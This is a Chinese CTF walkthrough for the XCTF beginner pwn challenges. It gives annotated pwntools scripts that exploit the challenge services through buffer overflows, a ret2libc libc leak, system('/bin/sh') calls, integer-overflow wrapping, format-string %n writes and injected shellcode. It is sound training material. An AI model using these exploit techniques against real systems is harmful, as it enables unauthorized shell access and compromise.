攻防世界pwn新手練習區通關教程

when_did_you_born

我們通過溢出來覆蓋v5爲1926即可

代碼塊

from pwn import *
# Connect to the "when_did_you_born" challenge service.
r = remote("124.126.19.106",31534)
# Payload layout: 0x20-0x18 = 8 filler bytes, then 1926 packed as a 64-bit
# little-endian integer (per the writeup, this overwrites v5 with 1926).
payload = 'a'* (0x20-0x18) +p64(1926)
# First prompt: answer the birth-year question with "2000".
r.recvuntil("What's Your Birth?\n")
r.sendline("2000")
# Second prompt: the name field receives the overflowing payload.
r.recvuntil("What's Your Name?\n")
r.sendline(payload)
# Python 2 print statements: dump whatever the service sends back.
print r.recv()
print r.recv()

hello_pwn

0x601068溢出4 bytes後輸入aaun即可

代碼塊

from pwn import *
# Connect to the "hello_pwn" challenge service.
r = remote("124.126.19.106",56061)
# Payload layout: 4 filler bytes, then 0x6e756161 as a 32-bit little-endian
# value, i.e. the bytes "aaun" (the writeup: overflow 4 bytes, then "aaun").
payload = 'a'* 4+p32(0x6e756161)
# Wait for the banner before sending.
r.recvuntil("lets get helloworld for bof")
r.sendline(payload)
# Python 2 print statements: dump whatever the service sends back.
print r.recv()
print r.recv()

level0

覆蓋buf

from pwn import *
# Connect to the "level0" challenge service.
r = remote("124.126.19.106",48024)
# 0x88 filler bytes (the writeup: fill buf), then 0x400596 as a 64-bit
# little-endian value. send() rather than sendline(): no trailing newline.
r.send('a'*0x88+p64(0x400596))
# Hand the connection over to the user.
r.interactive()

level2

初始的buf的空間只有0x88,但是讀取我們輸入的內容的時候,選擇的大小卻是0x100,造成了溢出

from pwn import *
# Connect to the "level2" challenge service (port passed as a string here).
p = remote('124.126.19.106','37679')
# Addresses taken from the challenge binary (see the writeup).
system = 0x8048320
bin_sh = 0x804A024
# Payload layout: 0x88 bytes to fill buf, 4 more bytes (presumably the saved
# frame pointer -- not stated on the page), then system, a 4-byte 0
# placeholder, and the bin_sh address, each as 32-bit little-endian values.
# The writeup: buf holds 0x88 bytes but the read accepts 0x100, hence the overflow.
payload = 'a' * (0x88 + 0x04) + p32(system) + p32(0) + p32(bin_sh)
# send() rather than sendline(): no trailing newline.
p.send(payload)
# Hand the connection over to the user.
p.interactive()

guess_num

直接覆蓋了60個重複的’a’即可

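from pwn import *
from ctypes import *

# Connect to the "guess_num" challenge service.
p=remote("124.126.19.106","58368")
# Payload layout: 0x20 filler bytes, then the value 1 as a 64-bit
# little-endian integer (the writeup: overwrite past the name buffer).
payload="a"*0x20+p64(1)
p.recvuntil("name:")
p.sendline(payload)
# Load the host's glibc once instead of calling LoadLibrary on every loop
# iteration as the original did. dlopen() of an already-loaded library
# returns the same mapping, so rand() continues the same sequence either way;
# this only hoists a loop-invariant call.
# NOTE(review): assumes the host's libc is at this path and that its rand()
# matches the challenge's -- confirm before relying on the sequence.
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
# Ten rounds: each answer is glibc's rand() % 6 + 1, sent as decimal text.
for _ in range(10):
    num = str(libc.rand()%6 + 1)
    p.recvuntil("number:")
    p.sendline(num)
# Hand the connection over to the user.
p.interactive()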

int_overflow

對於一個2字節的Unsigned short int型變量,它的有效數據長度爲兩個字節,當它的數據長度超過兩個字節時,就溢出

from pwn import *
# Connect to the "int_overflow" challenge service.
r = remote("124.126.19.106",59409)
# Address placed into the overwritten return slot (from the writeup).
return_address= 0x0804868B
# Menu: pick option "1", then supply a username.
r.sendlineafter(":", "1")
r.sendlineafter(":", "zzhwaxy")
r.recvuntil(":")
# Payload layout: 0x18 filler bytes, the 4-byte little-endian return
# address, then (256-0x18) more filler so the total is 260 bytes. The
# writeup attributes this to a length check on an unsigned short that wraps
# when the input is this long.
payload = "a" * 0x18 + p32(return_address)+"a"*(256-0x18)
r.sendline(payload)
# Hand the connection over to the user.
r.interactive()

cgpwn2

和0x06 level2原理相同,唯一的區別在於此題沒有cat flag或/bin/sh的字符串,需要自己構造即可

from pwn import *
# Connect to the "cgpwn2" challenge service.
r = remote('124.126.19.106',59666)
# Addresses taken from the challenge binary (see the writeup).
target = 0x804855A
binsh = 0x804A080
# Payload layout: 0x26 filler bytes + 'bbbb' (4 more), then target and
# binsh as 32-bit little-endian values.
payload = 'a'*0x26+'bbbb'+p32(target) +p32(binsh)
# First prompt (ends in "e\n"): supply the "/bin/sh" string ourselves --
# the writeup says the binary does not contain it. `a` is assigned but never used.
a = r.recvuntil('e\n')
r.sendline('/bin/sh')
# Second prompt (ends in ":\n"): send the overflowing payload.
a = r.recvuntil(':\n')
r.sendline(payload)
# Hand the connection over to the user.
r.interactive()

level3

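from pwn import *
# Remote process object for the challenge service.
p=remote('111.198.29.45',41496)
# Local process object, for debugging: p = process("./level3/level3")
# The challenge binary: source of PLT/GOT/symbol addresses.
elf=ELF('./level3/level3')
# The libc shipped with the challenge: source of the write/system offsets.
libc = ELF('./level3/libc_32.so.6')
# Addresses needed for the first stage.
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.sym['main']
# Consume the first prompt.
p.recvuntil(":\n")
# Stage 1 layout: char[0x88] | ebp | write@plt | return address (main) |
# arg1 = 1 (fd 1) | arg2 = write@got | arg3 = 4 (bytes to write)
payload=0x88*'a'+p32(0xdeadbeef)+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
p.sendline(payload)
# Read the 4 bytes that write() emits: the runtime address of write from the GOT.
# NOTE(review): u32() expects exactly 4 bytes; if the next prompt arrives in the
# same recv() this raises. The original had `print` fused onto this line
# (a SyntaxError from extraction); it is a separate statement here.
write_got_addr=u32(p.recv())
print hex(write_got_addr)
# libc load base = leaked write address - offset of write inside libc_32.so.6.
libc_base=write_got_addr-libc.sym['write']
print hex(libc_base)
# system() address in the loaded libc.
system_addr = libc_base+libc.sym['system']
print hex(system_addr)
# Address of the "/bin/sh" string. 0x15902b is its offset in libc_32.so.6,
# obtained with: strings -a -t x libc_32.so.6 | grep "/bin/sh"
bin_sh_addr = libc_base + 0x15902b
print hex(bin_sh_addr)
# Stage 2 layout: char[0x88] | ebp | system | return address for system
# (0x11111111 placeholder) | system's argument (bin_sh_addr)
payload2=0x88*'a'+p32(0xdeadbeef)+p32(system_addr)+p32(0x11111111)+p32(bin_sh_addr)
# Wait for the prompt again (write returned into main, which prints it anew).
p.recvuntil(":\n")
# Send the second-stage payload.
p.sendline(payload2)
# Hand the connection over to the user.
p.interactive()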

get_shell

直接運行即可

from pwn import *

# Log all traffic; useful when the service's prompt text is not known up front.
context.log_level = 'debug'
# Connect to the "get_shell" challenge service.
io = remote('124.126.19.106',45753)
# The writeup says no exploit step is needed: the command is sent directly.
io.sendline('cat flag')
# Hand the connection over to the user.
io.interactive()

string

通過格式化字符串漏洞修改v4[0]的值,使之與v4[1]相等。然後讀入shellcode並運行

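from pwn import *
# Connect to the "string" challenge service. Host and port are separate
# positional arguments; the original had a '.' between them, which is a
# SyntaxError (attribute access on a string literal followed by a literal).
p = remote("124.126.19.106","59075")
# 64-bit target: needed so asm()/shellcraft below emit amd64 code.
context(arch='amd64', os='linux', log_level='debug')
# The service prints the address of secret[0]; parse the hex value up to the newline.
p.recvuntil('secret[0] is ')
v4_addr = int(p.recvuntil('\n')[:-1], 16)
# Walk the text-adventure prompts up to the point where an address is accepted.
p.sendlineafter("What should your character's name be:", 'cxk')
p.sendlineafter("So, where you will go?east or up?:", 'east')
p.sendlineafter("go into there(1), or leave(0)?:", '1')
# The address is sent in decimal; v4_addr is already an int, so int() is a no-op here.
p.sendlineafter("'Give me an address'", str(int(v4_addr)))
# Format string: '%85c' emits 85 characters and '%7$n' stores that count
# through the 7th positional argument -- per the writeup, this makes v4[0]
# equal v4[1].
p.sendlineafter("And, you wish is:", '%85c%7$n')
# pwntools' stock /bin/sh shellcode, assembled for the arch set above.
shellcode = asm(shellcraft.sh())
p.sendlineafter("USE YOU SPELL", shellcode)
# Hand the connection over to the user.
p.interactive()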

CGfsb

我們需要將pwnme的地址輸入到s(也就是message)中去

在合適的位置上加一個`%n`,使其與我們輸入的地址對應從而造成漏洞利用即可

from pwn import *

# Connect to the "CGfsb" challenge service.
r = remote('124.126.19.106',57188)

# Address of the pwnme variable (from the writeup).
pwnme_addr = 0x0804A068

# Format string payload: the 4-byte little-endian address first, 4 filler
# bytes, then '%10$n', which stores the number of characters printed so far
# (8) through the 10th positional argument -- per the writeup, that argument
# is the address placed at the start of this message.
payload = p32(pwnme_addr) + 'aaaa' + '%10$n'

# First prompt: any name will do.
r.recvuntil("please tell me your name:\n")

r.sendline('BurYiA')

# Second prompt: the message field is the one passed to the format function.
r.recvuntil("leave your message please:\n")

r.sendline(payload)

# Hand the connection over to the user.
r.interactive()

 

攻略到這裏結束了~~~~~~~~

 

 
